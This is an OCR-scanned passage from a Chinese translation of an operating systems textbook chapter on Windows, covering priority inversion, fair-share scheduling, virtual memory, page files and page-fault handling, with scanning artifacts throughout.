个 完整 的 时 间 配 额 , 它 就 会 再 降 一 个 优先 级 ， 如 此 下 去 直到 降 到 它 的 基本 优先 级 ， 在 基本 优先 级 得 到 保持 
不 会 再 降 ， 直 到 它 的 优先 级 再 次 得 到 提升 。 

还 有 一 种 情况 就 是 系统 变动 (fiddle) 优先 级 。 假 设 有 两 个 线程 正在 一 个 生产 者 -消费 者 类 型 问题 上 
一 起 协同 工作 。 生 产 者 的 工作 需要 更 多 的 资源 ， 因 此 ， 它 得 到 高 的 优先 级 ， 例 如 说 12， 而 消费 者 得 到 的 
优先 级 为 4。 在 特定 的 时 刻 ， 生 产 者 已 经 把 共享 的 缓冲 区 填 满 ,信号 量 发 生 阻塞 ， 如 图 11-27a 所 示 。 


在 信号 量 上 执行 down 阻塞 
操作 ， 然 后 阻塞 在 信号 量 上 等 待 


A 


” ”在 信号 量 上 执行 
na G) up 操作 ， 但 未 被 调度 


a) b) 


图 11-27 优先 级 转 置 的 示例 


如 图 11-27b 所 示 ， 在 消费 者 得 到 调度 再 次 运行 之 前 ， 一 个 无 关 的 线程 在 优先 级 8 已 经 得 到 调度 运行 。 
只 要 这 个 线程 想 要 运行 , 它 将 会 一 直 运行 ， 因 为 这 个 线程 的 优先 级 高 于 消费 者 的 优先 级 ， 而 比 它 优先 级 
高 的 生产 者 由 于 阻塞 也 不 能 够 运行 。 在 这 种 情况 下 ， 直 到 优先 级 为 8 的 线程 运行 完毕 ， 生 产 者 才 有 机 会 
再 次 运行 。 这 个 问题 就 是 我 们 熟知 的 优先 级 反 转 。Windows 通 过 一 个 设备 来 描述 在 内 核 进程 之 间 的 优先 
级 反 转 ， 这 个 设备 位 于 叫 作 Autoboost 的 进程 调度 器 中 。Autoboost 在 进程 中 自动 跟踪 资源 依赖 性 ， 然 后 
增加 一 些 进程 的 调度 优先 级 ， 因 为 这 些 进 程 拥有 高 优先 级 进程 所 需要 的 资源 。 

Windows 在 PC 上 运行 ,一 次 通常 只 有 一 个 交互 式 会 话 存在 。 然 而 ，Windows 也 支持 终端 服务 器 模式 ， 
这 种 模式 通过 在 网 络 上 使 用 远程 桌面 协议 RDP (Remote Desktop Protocol) 来 支持 多 个 交互 式 会 话 同 时 
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存在 。 当 系统 运行 多 个 用 户 会 话 时 ， 很 容易 发 生 一 个 用 户 通 过 消耗 过 多 处 理 器 资源 来 干扰 其 他 用 户 的 情 
况 。Windows 执 行 一 种 保持 公平 份额 的 算法 ， 叫 作 动 态 公 平 份额 调度 DFSS (Dynamic Fair-Share 
Scheduling)， 它 保证 了 会 话 不 会 过 多 地 运行 。DFSS 使 用 调度 组 来 组 织 在 每 个 会 话 当中 的 线程 。 在 每 个 
组 中 Windows 按 照 正常 的 调度 策略 来 调度 进程 ， 但 是 每 个 组 都 会 或 多 或 少 地 访问 处 理 器 ， 总 体 来 说 是 按 
照 该 组 的 运行 程度 。 调 度 组 的 相对 优先 级 是 缓慢 调整 的 ， 目 的 是 允许 忽略 任务 的 小 冲突 并 减少 一 个 调度 
组 的 进程 数 ， 从 而 使 其 能 够 被 执行 ， 除 非 这 个 进程 长 时 间 访 问 处 理 器 。 


11.5 ”内存 管理 


Windows 有 一 个 极端 复杂 的 虚拟 内 存 系统 。 这 一 系统 包括 了 大 量 Win32 函 数 ， 这 些 函 数 通过 内 存 管 
理 器 (NTOS 执 行 层 最 大 的 组 件 ) 来 实现 。 在 下 面 章 节 中 ， 我 们 将 依次 了 解 它 的 基本 概念 、Win32 的 
API 调 用 以 及 它 的 实现 。 


11.5.1 基本 概念 

在 Windows 系 统 中 ， 每 个 用 户 进 程 都 有 它 自 己 的 虚拟 地 址 空间 。 对 于 x86 机 器 ， 虚 拟 地 址 是 32 位 
的 ， 因此 ， 每 个 进程 拥有 4GB 大 小 的 虚拟 地 址 空间 。 用 户 态 进程 和 内 核 进程 各 自 占用 2GB。 对 于 x64 机 
器 而 言 ， 在 可 预见 的 将 来 ， 不 管 是 用 户 态 进程 还 是 内 核 态 进程 都 会 占用 比 理论 上 更 多 的 虚拟 地 址 空间 。 
对 于 x86 和 x64 机 器 ， 虚 拟 地 址 空间 需要 分 页 ， 并 且 页 的 大 小 一 般 都 是 固定 在 4KB 一 一 虽然 在 有 些 情 况 下 
每 页 的 大 小 也 可 被 分 为 2MB (通过 只 使 用 页 目录 而 忽略 掉 页 表 )。 

图 11-28 表 示 了 三 个 x86 进 程 的 虚拟 地 址 空间 。 每 个 进程 的 底部 和 顶端 64KB 的 虚拟 地 址 空间 通常 保 
留 不 用 。 这 种 做 法 是 为 了 辅助 发 现 程序 错误 和 减轻 某 些 确定 类 型 的 漏洞 的 隐患 而 设置 的 。 


进程 C 


4GB 





w 底部 和 顶部 的 64KB 空 间 是 无 效 的 
图 11-28 x86 三 个 用 户 进程 的 虚拟 地 址 空间 。 白 色 的 区 域 为 每 个 进程 私有 的 。 阴 影 的 区 域 为 所 有 的 进程 共享 


从 64KB 开 始 为 用 户 私有 的 代码 和 数据 。 这 些 空间 可 以 扩充 到 几乎 GB。 而 最 顶端 的 2GB 包 含 了 操作 
系统 部 分 ， 包 括 代 码 、 数 据 、 换 页 内 存 池 和 非 换 页 内 存 池 。 除 了 每 一 进程 的 虚拟 内 存 数据 ( 像 页 表 和 工 
作 集 的 列表 )， 上 面 的 2GB 全 部 作为 内 核 的 虚拟 内 存 、 并 在 所 有 的 用 户 进程 之 中 共享 。 内 核 虚拟 内 存 仅 在 
内 核 态 才 可 以 访问 。 共 享 进程 在 内 核 部 分 的 虚拟 内 存 的 原因 是 ， 当 一 个 线程 进行 系统 调用 的 时 候 ， 它 陷 
入 内 核 态 之 后 不 需要 改变 内 存 映射 。 所 有 要 做 的 只 是 切换 到 线程 的 内 核 栈 。 从 性 能 上 看 ， 这 是 一 个 巨大 
的 成 功 ， 这 也 是 UNIX 正 在 做 的 一 些 东 西 。 由 于 进程 在 用 户 态 下 的 页 面 仍然 是 可 访问 的 ， 内 核 态 下 的 代码 
在 读 取 参 数 和 访问 缓冲 时 ， 就 不 用 在 地 址 空间 之 间 来 回 切换 ， 或 者 临时 将 页 面 进行 两 次 映射 。 这 里 的 权 
衡 是 用 较 小 的 进程 私有 地 址 空间 来 换取 更 快 的 系统 调用 。 

当 运 行 在 内 核 态 的 时 候 ，Windows 人 允许 线 程 访问 其 余 的 地 址 空间 。 这 样 该 线程 就 可 以 访问 所 有 用 户 
态 的 地 址 空间 ， 以 及 对 该 进程 来 说 通常 不 可 访问 的 内 核 地 址 空间 中 的 区 域 ， 例 如 页 表 的 自 映 射 区 域 。 在 
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线程 切换 到 用 户 态 之 前 ， 必 须 切换 到 它 最 初 的 地 址 空间 。 

1. 虚拟 地 址 分 配 

虚拟 地 址 的 每 页 处 于 三 种 状态 之 一 : 无 效 、 保 留 或 提交 。 无 效 页 面 (invalid page) 是 指 一 个 页 面 没 
有 被 映射 到 一 个 内 存 区 对 象 (section object) ， 对 它 的 访问 会 引发 一 个 相应 的 页 面 失效 。 一 旦 代码 或 数据 
被 映射 到 虚拟 页 面 ， 就 说 一 个 页 面 处 于 提交 (committed) 状态 。 在 提交 的 页 上 发 生 页 面 失效 会 导致 如 下 
情况 : 将 一 个 包含 了 引起 失效 的 虚拟 地 址 的 页 面 映射 到 这 样 的 页 面 一 一 由 内 存 区 对 象 所 表示 ， 或 被 保存 
于 页 面 文件 之 中 。 这 种 情况 通常 发 生 在 需要 分 配 物理 页 面 ， 以 及 对 内 存 区 对 象 所 表示 的 文件 进行 1/O 来 从 
硬盘 读 取 数据 的 时 候 。 但 是 页 面 失 效 的 发 生 也 可 能 是 页 表 正在 更 新 而 造成 的 ， 即 物理 页 面 仍 在 内 存 的 高 
速 缓存 中 ， 这 种 情况 下 不 需要 进行 JO。 这 些 叫 作 软 异常 (soft fault) ， 稍 后 我 们 会 更 详细 地 讨论 它们 。 

虚拟 页 面 还 可 以 处 于 保留 的 (reserved) 状态 。 保 留 的 虚拟 页 是 无 效 的 ， 但 是 这 些 页 面 不 能 被 内 存 
管理 器 用 于 其 他 目的 而 分 配 。 例 如 ， 当 创建 一 个 新 线程 时 ， 用 户 态 栈 空间 的 许多 页 保留 于 进程 的 虚拟 地 
址 空间 ， 仅 有 一 个 页 面 是 提交 的 。 当 栈 增长 时 ， 虚 拟 内 存 管理 器 会 自动 提交 额外 的 页 面 ， 直 到 保留 页 面 
耗 尽 。 保 留 页 面 的 功效 是 : 可 以 保证 栈 不 会 太 长 而 覆盖 其 他 进程 的 数据 。 保 留 所 有 的 虚拟 页 意味 着 栈 最 
终 可 以 达到 它 的 最 大 尺寸 ， 而 栈 所 需要 的 连续 虚拟 地 址 空间 的 页 面 ， 也 不 会 有 用 于 其 他 用 途 的 风险 。 除 
了 无 效 、 保 留 、 提 交 状 态 ， 页 面 还 有 其 他 的 属性 : 可 读 、 可 写 及 可 运行 (在 AMD64 兼 容 的 处 理 器 下 ) 。 

2. 页 面 文件 

关于 后 备 存 储 器 的 分 配 有 一 个 有 趣 的 权衡 ， 已 提交 页 面 没有 被 映射 于 特定 文件 。 这 些 页 使 用 了 页 面 
文件 (pagefile) 。 问 题 是 该 如 何以 及 何 时 把 虚拟 页 映射 到 页 面 文件 的 特定 位 置 。 一 个 简单 的 策略 是 : 当 
一 个 页 被 提交 时 ， 为 虚拟 页 分 配 一 个 硬盘 上 页 面 文件 中 的 页 。 这 会 确保 对 于 每 一 个 有 必要 换 出 内 存 的 已 
提交 页 ， 都 有 一 个 确定 的 位 置 写 回去 。 

Windows 使 用 一 个 适时 (just-in-time) 策略 。 直 到 需要 被 换 出 内 存 之 前 ， 在 页 面 文件 中 的 具体 空间 
不 会 分 配给 已 提交 的 页 面 。 硬 盘 空 间 当然 不 需要 分 配给 永远 不 换 出 的 页 面 。 如 果 总 的 虚拟 内 存 比 可 用 的 
物理 内 存 少 ， 则 根本 不 需要 页 面 文件 。 这 对 基于 Windows 的 嵌入 式 系统 是 很 方便 的 。 这 也 是 系统 启动 时 
的 方式 ， 因 为 页 面 文件 是 在 第 一 个 用 户 态 进程 smss.exe 启 动 之 后 才 初 始 化 的 。 

在 预 分 配 策略 下 ， 用 于 私有 数据 (如 栈 、 写 时 复制 代码 页 ) 的 全 部 虚拟 内 存 受到 页 面 文件 大 小 的 限 
制 。 通 过 适时 分 配 的 策略 ， 总 的 虚拟 内 存 大 小 是 物理 内 存 和 页 面 文件 大 小 的 总 和 。 既 然 相 对 物理 内 存 来 
说 硬盘 足够 大 与 便宜 ， 提 升 性 能 的 需求 自然 比 空间 的 节省 更 重要 。 

有 关 请 求 调 页 , 需要 马上 进行 初始 化 从 硬盘 读 取 页 的 请 求 一 一 因为 在 页 入 (page-in) 操作 完成 之 前 ， 
遇 到 页 面 失效 的 线程 无 法 继续 运行 下 去 。 对 于 失效 页 面 的 一 个 可 能 的 优化 是 : 在 进行 一 次 IO 操作 时 预 
调和 一些 额外 的 页 面 。 然而 ， 对 于 修改 过 的 页 写 回 磁盘 和 线程 的 执行 一 般 并 不 是 同步 的 。 用 于 分 配 页 面 
文件 空间 的 适时 策略 便 是 利用 这 一 点 ， 在 将 修改 过 的 页 面 写 入 页 面 文件 时 提升 性 能 : 修改 过 的 页 面 被 集 
中 到 一 起 ， 统 一 进行 写 人 操作 。 由 于 只 有 当 页 面 被 写 回 时 页 面 文件 的 空间 才 真 正 被 分 配 ， 可 以 通过 排列 
使 页 面 文件 中 的 页 面 较为 接近 甚至 连续 ,来 对 大 批 写 回 页 面 时 的 寻找 次 数 进行 优化 。 

当 存储 在 页 面 文件 中 的 页 被 读 取 到 内 存 中 时 ， 直 到 它们 第 一 次 被 修改 之 前 ， 这 些 页 面 一 直 保 持 它们 
在 页 面 文件 中 的 位 置 。 如 果 一 个 页 面 从 没 被 修改 过 ， 它 将 会 进入 到 一 个 空闲 物理 页 面 的 列表 中 去 一 一 这 
个 表 称 作 后 备 链表 (standby list) ， 这 个 表 中 的 页 面 可 以 不 用 写 回 硬盘 而 再 次 被 使 用 。 如 果 它 被 修改 ， 内 
存 管理 器 将 会 释放 页 面 文件 中 的 页 ， 并 且 内 存 将 保留 这 个 页 的 唯一 副本 。 这 是 内 存 管理 器 通过 把 一 个 加 
载 后 的 页 标识 为 只 读 来 实现 的 。 线 程 第 一 次 试图 写 一 个 页 时 ， 内 存 管 理 器 检测 到 它 所 处 的 情况 并 释放 页 
面 文件 中 的 页 ， 再 授权 写 操作 给 相应 的 页 ， 之 后 让 线程 再 次 进行 尝试 。 

Windows 支 持 多 达 16 个 页 面 文件 ， 通 常 分 布 到 不 同 的 磁盘 来 达到 较 高 的 IO 带宽 。 每 一 个 页 面 文件 
都 有 初始 的 大 小 和 随后 依 需 要 可 以 增长 到 的 最 大 空间 ， 但 是 在 系统 安装 时 就 创建 这 些 文件 达到 它 的 最 大 
值 是 最 好 的 。 如 果 当 文件 系统 非常 满 却 需要 增长 页 面 文件 时 ， 页 面 文件 的 新 空间 可 能 会 由 多 个 碎片 所 组 
成 ， 这 会 降低 系统 的 性 能 。 

操作 系统 通过 为 进程 的 私有 页 写 入 映射 信息 到 页 表 入 口 ， 或 与 原 页 表 入 口 相 对 应 的 共享 页 的 内 存 区 
对 象 ， 来 跟踪 虚拟 页 与 页 面 文 件 的 映射 关系 。 除 了 被 页 面 文件 保留 的 页 面 外 ， 进 程 中 的 许多 页 面 也 被 映 
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射 到 文件 系统 中 的 普通 文件 。 

程序 文件 中 的 可 执行 代码 和 只 读数 据 (例如 EXE 或 DLL) 可 以 映射 到 任何 进程 正在 使 用 的 地 址 空间 。 
因为 这 些 页 面 无 法 被 修改 ， 它 们 从 来 不 需要 换 出 内 存 ， 然 而 在 页 表 映 射 全 部 被 标记 为 无 效 后 ， 可 以 立即 
重用 物理 页 面 。 当 一 个 页 面 在 今后 再 次 需要 时 ， 内 存 管理 器 将 从 程序 文件 中 将 其 读 入 。 

有 时 候 页 面 开始 时 为 只 读 但 最 终 被 修改 。 例 如 ， 当 调试 进程 时 在 代码 中 设 定 中 断 点 ， 或 将 代码 重 定 
向 为 进程 中 不 同 的 地 址 ， 或 对 于 开始 时 为 共享 的 数据 页 面 进行 修改 。 在 这 些 情 况 下 ， 像 大 多 数 现代 操作 
系统 一 样 ，Windows 支 持 写 时 复制 (copy-on-write) 类 型 的 页 面 。 这 些 页 面 开始 时 像 普通 的 被 映射 页 面 
一 样 ， 但 如 果 试 图 修改 任何 部 分 页 面 ， 内 存 管 理 器 将 会 建立 一 份 私有 的 、 可 写 的 副本 。 然 后 它 更 新 虚拟 
页 面 的 页 表 ， 使 之 指向 那个 私有 副本 ， 并 且 使 线程 重新 进行 写 操作 一 一 这 一 次 将 会 成 功 。 如 果 这 个 副本 
之 后 需要 被 换 出 内 存 ， 那 么 它 将 被 写 回 到 页 面 文件 而 不 是 原始 文件 中 。 

除了 从 EXE 和 DLL 文 件 映射 程序 代码 和 数据 ， 一 般 的 文件 都 可 以 映射 到 内 存 中 ， 使 得 程序 不 需要 进 
行 显 式 的 读 写 操作 就 可 以 从 文件 引用 数据 。IO 操 作 仍然 是 必要 的 ， 但 它们 由 内 存 管理 器 通过 使 用 内 存 
区 对 象 隐 式 提供 ， 来 表示 内 存 中 的 页 面 和 磁盘 中 的 文件 块 的 映射 。 

内 存 区 对 象 并 不 一 定 和 文件 相关 。 它 们 可 以 和 匿名 内 存 区 域 相关 。 通 过 映射 匿名 内 存 区 对 象 到 多 个 
进程 ， 内 存 可 以 在 不 分 配 磁盘 文件 的 前 提 下 共享 。 既然 内 存 区 可 以 在 NT 名 字 空 间 给 予 名 字 ， 进 程 可 以 
通过 用 名 字 打 开 内 存 区 对 象 、 或 者 复制 进程 间 的 内 存 区 对 象 句柄 的 方式 来 进行 通信 。 


11.5.2 内 存 管理 系统 调用 

Win32 API 包含 了 大 量 的 函数 来 支持 一 个 进程 显 式 地 管理 它 自己 的 虚拟 内 存 ， 其 中 最 重要 的 函数 如 
图 11-29 所 示 。 它 们 都 是 在 包含 一 个 单独 的 页 或 由 两 个 或 多 个 在 虚拟 地 址 空间 中 连续 页 序列 的 区 域 上 进 
行 操作 的 。 当 然 ， 进 程 不 是 一 定 要 去 管理 它们 的 内 存 ， 分 页 自动 完成 ， 但 是 这 些 系统 调用 给 进程 提供 了 
额外 的 能 力 和 灵活 性 。 

前 四 个 API 函 数 是 用 来 分 配 、 释 放 、 保 护 和 查询 虚拟 地 址 空间 中 的 区 域 的。 被 分 配 的 区 域 总 是 从 
64KB 的 边界 开始 ， 以 尽量 减少 移植 到 将 来 的 体系 结构 的 问题 (因为 将 来 的 体系 结构 可 能 使 用 比 当 前 使 
用 的 页 更 大 的 页 )。 实 际 分 配 的 地 址 空间 可 以 小 于 64KB ， 但 是 必须 是 一 个 页 大 小 的 整数 倍 。 接 下 来 的 两 
个 API 使 得 一 个 进程 把 页 面 固定 到 内 存 中 以 防止 它们 被 替换 到 外 存 或 者 撤销 这 一 性 质 的 功能 。 举 例 来 说 ， 
一 个 实时 程序 可 能 需要 它 的 页 面具 有 这 样 的 性 质 以 防止 在 关键 操作 上 发 生 页 面 失效 。 操 作 系 统 强加 了 一 
个 限制 来 防止 一 个 进程 过 于 “ 贪 转 ": 这 些 页 面 能 够 移出 内 存 ， 但 是 仅仅 在 整个 进程 被 杰 换 出 内 存 的 时 
候 才能 这 么 做 。 当 该 进程 被 重新 装 入 内 存 时 ， 所 有 之 前 被 指定 固定 到 内 存 中 的 页 面 会 在 任何 线程 开始 运 
行 之 前 被 重新 装 入 内 存 。 尽 管 没 有 从 图 11-29 中 体现 出 来 ，Windows 还 包含 一 些 原生 API 函 数 来 允许 一 个 
进程 访问 其 他 进程 的 虚拟 内 存 。 前 提 是 该 进程 被 给 予 了 控制 权 ， 即 它 拥 有 一 个 相应 的 句柄 。 ， 
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图 11-29 Windows 中 用 来 管理 虚拟 内 存 的 主要 的 Win32 API ER AK 


列 出 的 最 后 四 个 API 函 数 是 用 来 管理 内 存 映射 文件 的 。 为 了 映射 一 个 文件 ， 首 先 必须 通过 调用 
CreateFileMapping 来 创建 一 个 文件 映射 对 象 (图 11-21)。 这 个 函数 返回 一 个 文件 映射 对 象 〈 即 一 个 内 
存 区 对 象 ) 的 句柄 ， 并 且 可 以 选择 是 否 为 该 操作 添加 一 个 名 字 到 Win32 地 址 空间 中 ， 从 而 其 他 的 进程 也 
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能 够 使 用 它 。 接 下 来 的 两 个 函数 从 一 个 进程 的 虚拟 地 址 空间 中 映射 或 取消 映射 内 存 区 对 象 之 上 的 视图 。 
最 后 一 个 API 能 被 一 个 进程 用 来 映射 其 他 进程 通过 调用 CreateFileMapping 创 建 并 共享 出 来 的 映射 ,这 
样 的 映射 通常 是 为 了 映射 匿名 内 存 而 建立 的 。 通 过 这 样 的 方式 ， 两 个 或 多 个 进程 能 够 共享 它们 地 址 空间 
中 的 区 域 。 这 一 技术 允许 它们 写 内 容 到 彼此 的 虚拟 内 存 的 受 限 的 区 域 中 。 


153 存储 管理 的 实现 

运行 在 x86 处 理 器 上 的 Windows 操 作 系 统 为 每 个 进程 都 单独 提供 了 一 个 4GB 大 小 的 按 需 分 页 
(demand-paged) 的 线性 地 址 空间 ， 不 支持 任何 形式 的 分 段 。 从 理论 上 说 ， 页 面 的 大 小 可 以 是 不 超过 
64KB 的 2 的 任何 次 宕 。 但 是 在 x86 处 理 器 上 ， 页 面 正 常情 况 下 固定 地 设置 成 4KB 大 小 。 另 外 ， 操 作 系统 
可 以 使 用 4MB 的 页 来 改进 处 理 器 存储 管理 单元 中 的 快 表 (Translation Lookaside Buffer, TLB) 的 效率 。 
内 核 以 及 大 型 应 用 程序 使 用 了 4MB 大 小 的 页 面 以 后 ， 可 以 显著 地 提高 性 能 。 这 是 因为 TLB 的 命中 率 提 高 
了 ， 并 且 访 问 页 表 以 寻找 在 TLB 表 中 没有 找到 的 表 项 的 次 数 减 少 了 。 

调度 器 选择 单个 线程 来 运行 而 不 太 关心 进程 ， 存 储 管理 器 则 不 同 ， 它 完全 是 在 处 理 进 程 而 不 太 关 心 
线程 。 毕 竟 ， 是 进程 而 非 线程 拥有 地 址 空间 ， 而 地 址 空间 正 是 存储 管理 器 所 关心 的 。 当 虚拟 地 址 空间 中 
的 一 片区 域 被 分 配 之 后 ， 就 像 图 11-30 中 进程 A 已 被 分 配 的 4 片区 域 那 样 ， 存 储 管理 器 会 为 它 创 建 一 个 虚拟 
地 址 描述 符 (Virtual Address Descriptor，VAD)。VAD 列 出 了 被 映射 地 址 的 范围 ， 用 来 表示 作为 后 备 存储 
的 文件 以 及 文件 被 映射 区 域 起 始 位 置 的 节 区 以 及 权限 。 当 访问 第 一 个 页 面 的 时 候 ， 创 建 一 个 页 目录 并 且 
把 它 的 物理 地 址 插入 进程 对 象 中 。 一 个 地 址 空间 被 一 个 VAD 的 列表 所 完全 定义 。VAD 被 组 织 成 平衡 树 的 
形式 ， 从 而 保证 一 个 特定 地 址 的 描述 符 能 够 被 快速 地 找到 。 这 个 方案 支持 稀疏 的 地 址 空间 。 被 映射 的 区 
域 之 间 未 使 用 的 地 址 空间 不 会 使 用 任何 内 存 中 或 磁盘 上 的 资源 ， 从 这 个 意义 上 说 ， 它 们 是 “免费 ”的 。 


磁盘 上 的 后 备 存储 








progl.exe prog2.exe 
图 11-30 被 映射 的 区 域 以 及 它们 在 磁盘 上 的 “影子 ”页 面 。lib.dll 文件 被 同时 映射 到 两 个 地 址 空间 中 


1. 页 面 失效 处 理 

当 在 Windows 上 启动 一 个 进程 的 时 候 ， 很 多 映射 了 程序 的 EXE 和 DLL 映像 文件 的 页 面 可 能 已 经 在 内 
存 中 ， 这 是 因为 它们 可 能 被 其 他 进程 共享 。 映 像 中 的 可 写 页 面 被 标记 成 写 时 复制 (copy-on-write) ， 使 
得 它们 能 一 直 被 共享 ， 直 到 内 容 要 被 修改 的 那 一 刻 。 如 果 操 作 系统 从 一 次 过 去 的 执行 中 认 出 了 这 个 EXE， 
它 可 能 已 经 通过 使 用 微软 称 之 为 超级 预 读 取 (SuperFetch) 的 技术 记录 了 页 面 引用 的 模式 。 超 级 预 读 取 
技术 尝试 预先 读 和 很 多 需要 的 页 面 到 内 存 中 ， 尽 管 进程 尚未 在 这 些 页 面 上 发 生 页 面 失效 。 这 一 技术 通过 
重合 从 磁盘 上 读 入 页 面 和 执行 映像 中 的 初始 化 代码 ， 减 小 了 启动 应 用 程序 所 需 的 延 时 。 同 时 ， 它 改进 了 
磁盘 的 吞吐 量 ， 因 为 使 用 了 超级 预 读 取 技 术 以 后 ， 磁 盘 驱动 器 能 够 更 轻易 地 组 织 对 磁盘 的 读 请 求 来 减少 
所 需 的 寻 道 时 间 。 进 程 预约 式 页 面 调 度 (prepaging) 技术 也 用 到 了 系统 启动 、 把 后 台 应 用 程序 移 到 前 台 
以 及 休眠 之 后 重启 系统 当中 。 
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存储 管理 器 支持 预约 式 页 面 调度 ， 但 是 它 被 实现 成 系统 中 一 个 单独 的 组 件 。 被 读 入 到 内 存 的 页 面 时 不 是 
插入 到 进程 的 页 表 中 ， 而 是 插入 到 后 备 列表 中 ， 从 而 使 得 在 需要 时 可 以 不 访问 磁盘 就 将 它们 插入 到 进程 中 。 

未 被 映射 的 页 面 稍微 有 些 不 同 。 它 们 没有 被 通过 读 取 文 件 来 初始 化 。 相 反 ， 一 个 未 被 映射 的 页 面 第 
a ee 存储 管理 器 会 提供 一 个 新 的 物理 页 面 ， 该 页 面 的 内 容 被 事先 清 零 (为 了 安全 方面 的 

因 )。 在 后 续 的 页 面 失 效 处 理 过 程 中 ， 未 被 映射 的 页 面 可 能 会 被 从 内 存 中 找到 ， 否 则 的 话 ， 它 们 必须 
和 

存储 管理 器 中 的 按 需 分 页 是 通过 页 面 失效 来 驱动 的 。 在 每 次 页 面 失效 发 生 的 时 候 ， 会 发 生 一 次 到 内 
核 的 陷入 。 内 核 将 建立 一 个 说 明 发 生 了 什么 事情 的 机 器 无 关 的 描述 符 ， 并 把 该 描述 符 传递 给 存储 管理 器 
相关 的 执行 部 件 。 存 储 管理 器 接 下 来 会 检查 引发 页 面 失效 的 内 存 访问 的 有 效 性 。 如 果 发 生 页 面 失效 的 页 
面 位 于 一 个 已 提交 的 区 域内 ， 存 储 管理 器 将 在 VAD 列 表 中 查找 页 面 地 址 并 找到 (或 创建 ) 进程 页 表 项 。 
对 于 共享 页 面 的 情况 ， 存 储 管理 器 使 用 与 内 存 区 对 象 关联 的 原始 页 表 项 来 填写 进程 页 表 中 的 新 页 表 项 。 

不 同 处 理 器 体系 结构 下 的 页 表 项 的 格式 可 能 会 不 同 。 对 于 x86 和 x64， 一 个 被 映射 页 面 的 页 表 项 如 
图 11-31 所 示 。 如 果 一 个 页 表 项 被 标记 为 有 效 ， 它 的 内 容 会 被 硬件 读 取 并 解释 ， 从 而 虚拟 地 址 能 够 转换 
成 正确 的 物理 地 址 。 未 被 映射 的 页 面 也 有 对 应 的 页 表 项 ， 但 是 这 些 页 表 项 被 标记 成 无 效 ， 硬 件 将 忽略 这 
些 页 表 项 除 该 标记 之 外 的 部 分 。 页 表 项 的 软件 格式 与 硬件 格式 有 所 不 同 ， 软 件 格式 由 存储 管理 器 决定 。 
例如 ， 对 于 一 个 未 映射 的 页 面 ， 它 必须 在 使 用 前 分 配 和 清 零 ， 这 一 点 可 以 通过 页 表 项 来 表明 。 

页 表 项 中 有 两 个 重要 的 位 是 硬件 直接 更 新 的 ， 它 们 是 访问 位 (access bit) 和 脏 位 (dirty bit) 。 这 两 
个 位 跟踪 了 什么 时 候 一 个 特定 的 页 面 映射 用 来 访问 该 页 面 以 及 这 个 访问 是 否 以 写 的 方式 修改 了 页 面 的 内 
容 。 这 确实 很 有 助 于 提高 系统 性 能 。 因 为 存储 管理 器 可 以 使 用 访问 位 来 实现 LRU (Least-Recently Used, 
最 近 最 少 使 用 ) 类 型 的 页 面 替换 策略 。LRU 原 理 是 ， 那 些 最 长 时 间 没 有 被 使 用 过 的 页 面 有 最 小 的 可 能 性 
在 不 久 的 将 来 被 再 次 使 用 。 访 问 位 使 存储 管理 器 知道 一 个 页 面 被 访问 过 了 ， 脏 位 使 存储 管理 器 知道 一 个 
页 面 被 修改 了 ， 或 者 更 重要 的 是 ， 一 个 页 面 没有 被 修改 。 如 果 一 个 页 面 自从 从 磁盘 上 读 到 内 存 后 没有 被 
修改 过 ， 存 储 管理 器 就 没有 必要 在 将 该 页 面 用 到 其 他 地 方 之 前 将 页 面 内 容 写 回 磁盘 了 。 

正如 图 11-33 所 示 ，x86 和 x64 体 系 结构 都 使 用 64 位 大 小 的 页 表 项 。 
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图 11-31 一 个 Intel x86 体 系 结构 和 AMD x64 体 系 结构 上 的 已 映射 页 面 的 页 表 项 (PTE) 


每 个 页 面 失效 都 可 以 归 入 以 下 五 类 中 的 一 类 : 

1) 所 引用 的 页 面 没 有 提交 。 

2) 尝试 违反 权限 的 页 面 访问 。 

3) 修改 一 个 共享 的 写 时 复制 页 面 。 

4) 需要 扩大 栈 。 

5) 所 引用 的 页 已 经 提交 但 是 当前 没有 映射 。 

第 一 种 和 第 二 种 情况 是 由 于 编程 错误 引起 。 如 果 一 个 程序 试图 使 用 一 个 没有 有 效 映 射 的 地 址 或 试图 


530 #UE 


进行 一 个 称 为 访问 违例 (access violation) 的 无 效 操作 (例如 试图 写 一 个 只 读 的 页 面 )， 通 常 的 结果 是 
这 个 进程 会 被 终止 。 访 问 破坏 的 原因 通常 是 坏 指针 ， 包 括 访问 从 进程 释放 的 和 被 解除 映射 的 内 存 。 

第 三 种 情况 与 第 二 种 情况 有 相同 的 症状 〈 试 图 写 一 个 只 读 的 页 面 )， 但 是 处 理 方式 是 不 一 样 的 。 因 
为 页 面 已 经 标记 为 写 时 复制 ， 存 储 管理 器 不 会 报告 访问 违例 ， 相 反 它 会 为 当前 进程 产生 一 个 该 页 面 的 私 
有 副本 ， 然 后 返回 到 试图 写 该 页 面 的 线程 。 该 线程 将 重 试 写 操作 ， 而 这 次 的 写 操作 将 会 成 功 完 成 而 不 会 
引发 页 面 失 效 。 

第 四 种 情况 在 线程 向 栈 中 压 入 一 个 值 ， 而 这 个 值 会 被 写 到 一 个 还 没有 被 分 配 的 页 面 的 情况 下 发 生 。 
存储 管理 器 程序 能 够 识别 这 种 特殊 情况 。 只 要 为 栈 保 留 的 虚拟 页 面 还 有 空间 ， 存 储 管理 器 就 会 提供 一 个 
新 的 物理 页 面 ， 将 该 页 面 清 零 ， 最 后 把 该 页 面 映射 到 进程 地 址 空间 。 线 程 在 恢复 执行 的 时 候 会 重 试 上 次 
引发 页 面 失效 的 内 存 访问 ， 而 这 次 该 访问 会 成 功 。 

最 后 ， 第 五 种 情况 就 是 常见 的 页 面 失效 。 这 种 异常 包含 下 述 几 种 情况 。 如 果 该 页 是 由 文件 映射 的 ， 
内 存 管 理 器 必须 查找 该 页 与 内 存 区 对 象 结合 在 一 起 的 原型 页 表 等 类 似 的 数据 结构 ， 从 而 保证 在 内 存 中 不 
存在 该 页 的 副本 。 如 果 该 页 的 副本 已 经 在 内 存 中 ， 即 在 另 一 个 进程 的 页 面 链表 已 经 存在 该 页 面 的 副本 ， 
或 者 在 后 备 、 已 修改 页 链表 中 ， 则 只 需要 共享 该 页 即 可 。 否 则 ， 内 存 管 理 器 分 配 一 个 空闲 的 物理 页 面 ， 
并 安排 从 磁盘 复制 文件 页 ， 除 非 另 外 一 个 页 面 正在 从 磁盘 中 转变 ， 这 种 情况 的 话 只 能 等 到 转变 结束 之 后 
再 去 执行 。 

如 果 内 存 管理 器 能 够 从 内 存 中 找到 需要 的 页 而 不 是 去 磁盘 查找 来 响应 页 面 失效 ， 则 称 为 软 异 常 
